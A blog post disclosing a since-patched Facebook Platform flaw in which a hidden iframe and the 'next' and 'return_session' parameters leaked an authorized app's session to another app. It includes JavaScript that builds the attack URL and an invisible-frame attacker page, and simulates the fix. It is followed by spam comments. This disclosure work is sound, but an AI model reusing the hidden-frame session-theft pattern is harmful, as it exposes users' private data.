Posted by theharmonyguy in Facebook | 199 comments
Facebook Platform Vulnerability Enabled Silent Data Harvesting
A few weeks ago, I sent Facebook a demonstration of what appeared to be a previously unknown attack combining two behaviors of the Facebook Platform. The technique allowed one to create a seemingly innocent web page that would invisibly and silently steal a visitor’s private Facebook content. Facebook has now disabled the attack by modifying one of the exploited behaviors.
It’s unlikely that any real-world attacks used this particular vulnerability, and I certainly have no record of such a case. But it’s also unclear how long the problem has existed. I discovered one part of the technique, a “return_session” parameter for application authorization, while examining the behavior of the Yahoo! contact importer, which only launched a month ago. However, discussions on Facebook’s developer forum mention the parameter in the context of Facebook Connect implementations as far back as February 2009. The other main component, now modified by Facebook, may have existed since the beginning of the Platform in 2007.
In my proof-of-concept demonstration, I loaded a harmless-looking web page on a server external to Facebook. The page included code for an inline frame sized to be invisible to the user. This frame then loaded the login page for a Facebook application. If the user has already authorized an application, its login page will automatically forward to the application, and that’s exactly what I wanted to happen. I chose FarmVille for my demo, since it has a wide install base. Keep in mind that while FarmVille currently lists about 83 million monthly active users, the attack would have worked for anyone who has authorized the application, regardless of how long ago. The attack could also target multiple applications at once using multiple iframes, meaning nearly any of Facebook’s 400 million active users could have fallen prey.
The first main component of the attack involved a slight modification to the login page URI. By adding a “next” parameter, one can specify an alternate landing page for authorized users. Not all applications take advantage of this parameter, but many do. The parameter would not work for an arbitrary site, but Facebook previously allowed any URI that began with apps.facebook.com. Thus one could craft a login page URI that checked whether the user had authorized one application and then forwarded the user to a second application.
The next part of the attack came from adding “return_session=1” to the login page URI. This parameter causes Facebook to append particular session variables for the authorized application onto the URI of the landing page – in our case, the second application given by the “next” parameter. That application merely has to check its own address for the session data, which provides enough information to execute API requests using the credentials of the already authorized application. Since an authorized application essentially operates on behalf of a user, it has access to nearly all private profile information (essentially, everything but your e-mail address and phone number) and content (photos, links, notes, etc.) that can be loaded via the API, and hence the second application had such access as well. This entire process could be fully automated without any user interaction and did not require any authorization for the second application. Also, the attack could generally be executed quickly enough to avoid Facebook’s measures for detecting when their pages are loaded in frames.
To patch the attack, Facebook has restricted the “next” parameter; it now only forwards to addresses for the application specified on the login page, preventing any appended session data from reaching the wrong destination. Since an authorized application already has API access, using return_session with that application will not add any new privileges.
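To make the flow concrete, here is an added illustration in JavaScript. It is not theharmonyguy’s proof of concept and not Facebook code. It assumes a login page of the form http://www.facebook.com/login.php?api_key=..., that return_session=1 appends the session data as a single “session” query parameter holding JSON, and that each application lives under a canvas path on apps.facebook.com; all three are assumptions made for illustration, as are the names VICTIM_APP_API_KEY and attackerapp and the sample session values, which are constructed. The functions nextAllowedBefore and nextAllowedAfter model the redirect policy before and after the fix as the post describes it, and simulateRedirect shows that after the fix the session data can only land on the victim application’s own canvas, where it adds no privilege.

```javascript
// Added illustration of the attack flow described above. Not the original PoC
// and not Facebook's code. Assumed (hypothetical) shapes:
//   - login page: http://www.facebook.com/login.php?api_key=<app key>
//   - return_session=1 appends ?session=<JSON> to the landing URL
//   - each application has a canvas path under http://apps.facebook.com/<canvas>/

// The URL a hidden iframe on the attacker's page would load. If the victim has
// already authorized the application behind victimApiKey, the login page
// forwards to nextUrl without any interaction.
function buildAttackUrl(victimApiKey, nextUrl) {
  const u = new URL('http://www.facebook.com/login.php');
  u.searchParams.set('api_key', victimApiKey);
  u.searchParams.set('next', nextUrl);
  u.searchParams.set('return_session', '1');
  return u.toString();
}

// The harmless-looking page: one invisible frame per targeted application.
// '&' is escaped so the URLs are valid inside HTML attributes.
function attackerPageHtml(attackUrls) {
  const frames = attackUrls
    .map((u) => `<iframe src="${u.replace(/&/g, '&amp;')}" width="0" height="0" style="display:none"></iframe>`)
    .join('\n');
  return `<html><body><p>Nothing to see here.</p>\n${frames}\n</body></html>`;
}

// Policy before the fix, as the post describes it: any apps.facebook.com
// address is an acceptable "next", so it may name a different application.
// (Simplified to a hostname check; the exact original check is not known.)
function nextAllowedBefore(nextUrl) {
  let u;
  try { u = new URL(nextUrl); } catch { return false; }
  return u.hostname === 'apps.facebook.com';
}

// Policy after the fix: "next" must stay within the canvas path of the
// application named on the login page (assumed canvas-path model).
function nextAllowedAfter(nextUrl, appCanvasPath) {
  let u;
  try { u = new URL(nextUrl); } catch { return false; }
  if (u.hostname !== 'apps.facebook.com') return false;
  const base = '/' + appCanvasPath.replace(/^\/+|\/+$/g, '') + '/';
  return (u.pathname + '/').startsWith(base);
}

// Facebook's side for an already-authorized user: pick the landing URL under
// the given policy, falling back to the app's own canvas when "next" is
// rejected, then append the session data if return_session=1 was requested.
function simulateRedirect(attackUrl, victimCanvasPath, session, policy) {
  const u = new URL(attackUrl);
  const next = u.searchParams.get('next');
  const allowed = policy === 'before'
    ? nextAllowedBefore(next)
    : nextAllowedAfter(next, victimCanvasPath);
  const dest = new URL(allowed ? next : `http://apps.facebook.com/${victimCanvasPath}/`);
  if (u.searchParams.get('return_session') === '1') {
    dest.searchParams.set('session', JSON.stringify(session));
  }
  return dest.toString();
}

// The landing application's side: read whatever session data arrived in its
// own address. Returns null when nothing usable was appended.
function extractSession(landingUrl) {
  const raw = new URL(landingUrl).searchParams.get('session');
  if (!raw) return null;
  try { return JSON.parse(raw); } catch { return null; }
}

// Constructed sample session; not real Facebook data.
const SAMPLE_SESSION = {
  session_key: 'constructed-session-key',
  uid: '100000000',
  secret: 'constructed-secret',
  expires: 0,
};

function demo() {
  const attackUrl = buildAttackUrl('VICTIM_APP_API_KEY', 'http://apps.facebook.com/attackerapp/collect');
  const before = simulateRedirect(attackUrl, 'farmville', SAMPLE_SESSION, 'before');
  const after = simulateRedirect(attackUrl, 'farmville', SAMPLE_SESSION, 'after');
  return {
    page: attackerPageHtml([attackUrl]),
    before,                              // session lands on attackerapp
    after,                               // session lands on farmville itself
    leakedBefore: extractSession(before),
    leakedAfter: extractSession(after),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Under the “before” policy the second application receives the victim application’s session in its own query string with no authorization of its own; under the “after” policy the same request still carries return_session=1, but the data can only be delivered to the application that already holds that access.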
I commend Facebook for responding quickly to this issue and for being open to white-hat security reports. But in my opinion, this vulnerability is simply the latest reminder that the Facebook Platform can open users to many problems quite separate from the security of Facebook itself. I personally think that aspects of the Platform’s implementation fail to match user expectations of privacy, as I’ve discussed previously. And while this particular problem may be solved, vulnerabilities in specific applications and the nature of application access continue to put private data at risk of unwanted disclosure.
Writing is exceptional, I like your article that fresh soul, you read the article more attractive.
That is a very good comment you shared. Thank you so much for sharing those things with us. I'm wishing you to carry on with your achievements. All the best.
It’s hard to find experienced people about this topic, however you seem like you understand just what you’re referring to! Thanks a lot
Facebook is great to use, but there are some problems inside.
I like this post very much. Please write more and more about this. Very useful and interesting.
I was glad I happened to stop by your blog. My research is almost done, thanks for sharing this.
It’s actually a great and helpful piece of information. I am happy that you shared this helpful information with us. Please keep us informed like this. Thank you for sharing.
It’s a really good post…
Wow, Private lives exposed wide open
come here thank you~
This is really nice blog, I am very impressed.
THIS IS A GOOD ARTICLE
Very useful stuff in here…..
t rather easy for spammers to gain access to my feed and spam my social network. Or how about …
Nice post. Thank you for taking the time to publish this information, very useful! I’m still waiting for some interesting thoughts from your side in your next post, thanks!
Thanks for sharing. I will necessarily add it to my selected works and I will visit this site.
I like what you write, really very good!
I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work!
Great videos! Thank you!!
Microsoft Windows 8 will have a unified desktop and mobile systems for both platforms, which can give consumers a more unified operating experience.
This really answered my problem, thank you!… I think happy should be shared for everyone. I adore your site very much.
I just read about this in the paper! It contains wonderful and helpful posts. How I wish I’d known about this blog before. I would have loved to have worked on this project! What a great accomplishment. Beautiful. Congratulations to you.Thanks for your information!It is a good post i think!
I like the style of your writing.
Well, this blog is great, I love reading your articles.
Wow! I really loved reading your blog. It was very well written and simple to understand, unlike other blogs I have read.
This is a great one, nice article, thanks for sharing it with us… I learn a lot from your words. Thanks for the post.
If you want to see the mind blowing article with real facts and figures, this has really tremendous impacts on readers and I admire the writing skill of the author.
Thank you for your article. It’s very useful to me!
I love this article. Thank you for sharing!
Thanks for sharing this information. Glad that I found it with the help of the link that you’ve shared. I will come again.
As a designer who rose in London, Jenny Packham won a prize as the best designer in England. In 2010, Jenny Packham won a British Export Award. To this day, the Jenny Packham brand’s path has met with great success. She has caught many eyes around the world. Her works can often be seen at parties: the 2011 cocktail dress, the evening dress for weddings, etc. Many people choose her for a wedding dress at the wedding ceremony.
OK really very good!